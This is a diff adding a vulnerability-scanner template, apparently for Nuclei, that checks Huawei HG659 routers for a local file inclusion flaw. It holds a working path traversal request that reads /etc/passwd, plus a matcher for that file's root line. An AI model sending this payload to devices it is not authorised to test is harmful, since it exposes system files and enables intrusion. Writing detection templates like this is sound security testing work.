diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml new file mode 100644 index 0000000000..9ecdf99635 --- /dev/null +++ b/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -0,0 +1,26 @@ +id: huawei-hg659-lfi + +info: + name: HUAWEI HG659 LFI + author: pikpikcu + severity: high + reference: | + - https://twitter.com/sec715/status/1406782172443287559 + tags: lfi,huawei + +requests: + - method: GET + path: + - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200